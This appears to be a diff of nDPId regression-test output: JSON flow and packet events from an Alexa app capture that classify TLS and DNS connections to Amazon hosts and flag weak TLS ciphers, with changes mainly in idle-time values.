+00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1869,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_packet_id":3,"flow_last_seen":1490976115065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115065,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo8bNAAEAGVU+sECrYNF7ohrKhAbvIHJqEjYGDWFAQAVeS2AAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1870,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_packet_id":3,"flow_last_seen":1490976115065,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115065,"pkt":"AMDKkaPvePiC0\/vCCABFAAAou1NAAEAGi6+sECrYNF7ohrKgAbstn9Bj0Qs3IlAQAVcAJAAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1871,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAomqNAAEAGrF+sECrYNF7ohrKiAbt67fGRhH1dDlAQAVe4RwAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1872,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7MxAAEAGWjasECrYNF7ohrKjAbuMuIgApZSj01AQAVeoMAAA"} +00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1873,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_packet_id":3,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976115066,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoCnNAAEAGPJCsECrYNF7ohrKkAbvN5GFIckqrkVAQAVe5RwAA"} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1874,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114894,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1875,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114885,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1876,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114906,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1877,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114921,"flow_last_seen":1490976115066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115066,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00859{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1878,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976114940,"flow_last_seen":1490976115067,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976115067,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1879,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114894,"flow_last_seen":1490976115189,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115189,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45729,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1882,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114906,"flow_last_seen":1490976115200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45730,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1883,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114885,"flow_last_seen":1490976115200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45728,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1884,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114921,"flow_last_seen":1490976115200,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115200,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45731,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1888,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976114940,"flow_last_seen":1490976115201,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976115201,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45732,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1490976115835,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":99,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":99,"pkt_l4_len":65,"thread_ts_msec":1490976115835,"pkt":"AMDKkaPvePiC0\/vCCABFAABVWl5AAEARM0CsECrYrBAqAW\/GADUAQT0E1ZsBAAABAAAAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQAB"} 00806{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1937,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115835,"flow_last_seen":1490976115835,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":57,"flow_tot_l4_payload_len":57,"flow_avg_l4_payload_len":57,"midstream":0,"thread_ts_msec":1490976115835,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00543{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_packet_id":2,"flow_last_seen":1490976115901,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"thread_ts_msec":1490976115901,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl30tAAEARrkKsECoBrBAq2AA1b8YAUeVS1ZuBgAABAAEAAAAAD21vYmlsZWFuYWx5dGljcwl1cy1lYXN0LTEJYW1hem9uYXdzA2NvbQAAAQABwAwAAQABAAAAIQAENu8YtA=="} 00821{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1940,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976115835,"flow_last_seen":1490976115901,"flow_idle_time":180000,"flow_min_l4_payload_len":57,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":130,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976115901,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":28614,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"dns": {"query":"mobileanalytics.us-east-1.amazonaws.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"54.239.24.180"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115905,"flow_last_seen":1490976115905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976115905,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1490976115905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976115905,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JUVAAEAG7uusECrYNu8YtJKvAbsZEE7TAAAAAKAC\/\/+4mQAAAgQFtAQCCAoA9muWAAAAAAEDAwg="} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976116084,"flow_last_seen":1490976116084,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976116084,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1490976116084,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976116084,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8uXBAAEAGWsCsECrYNu8YtJKwAbtgAdLYAAAAAKAC\/\/\/tjwAAAgQFtAQCCAoA9muoAAAAAAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":2,"flow_last_seen":1490976116119,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116119,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwcfNAAOcG+0g27xi0rBAq2AG7kq+qRjf5GRBO1HASH\/5e8QAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":3,"flow_last_seen":1490976116121,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116121,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoJUZAAEAG7v6sECrYNu8YtJKvAbsZEE7UqkY3+lAQAVepYgAA"} -00884{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1945,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976115905,"flow_last_seen":1490976116122,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976116122,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":2,"flow_last_seen":1490976116248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976116248,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwirZAAOcG4oU27xi0rBAq2AG7krCs\/eb6YAHS2XASH\/7iQAAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":116,"flow_packet_id":3,"flow_last_seen":1490976116249,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976116249,"pkt":"AMDKkaPvePiC0\/vCCABFAAAouXFAAEAGWtOsECrYNu8YtJKwAbtgAdLZrP3m+1AQAVcssgAA"} -00939{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1969,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1490976115905,"flow_last_seen":1490976118335,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":933,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1490976118335,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobileanalytics.us-east-1.amazonaws.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976130073,"flow_last_seen":1490976130073,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976130073,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2001,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1490976130073,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976130073,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8j51AAEAGf0qsECrYNu8d\/Z+gAbt6Gf6DAAAAAKAC\/\/+QHQAAAgQFtAQCCAoA9nEeAAAAAAEDAwg="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2002,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":2,"flow_last_seen":1490976130307,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976130307,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAww\/RAAOcGo\/427x39rBAq2AG7n6DOZIqUehn+hHASH\/7FQwAAAgQFtAEDAwY="} -00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2003,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_packet_id":3,"flow_last_seen":1490976130308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976130308,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoj55AAEAGf12sECrYNu8d\/Z+gAbt6Gf6EzmSKlVAQAVcPtQAA"} -00863{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2004,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976130073,"flow_last_seen":1490976130310,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976130310,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01026{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2005,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976130073,"flow_last_seen":1490976130469,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":243,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":65,"midstream":0,"thread_ts_msec":1490976130469,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.29.253","src_port":40864,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"skills-store.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976115905,"flow_last_seen":1490976115905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976115905,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.180","src_port":37551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1490976115905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976115905,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8JUVAAEAG7uusECrYNu8YtJKvAbsZEE7TAAAAAKAC\/\/+4mQAAAgQFtAQCCAoA9muWAAAAAAEDAwg="} 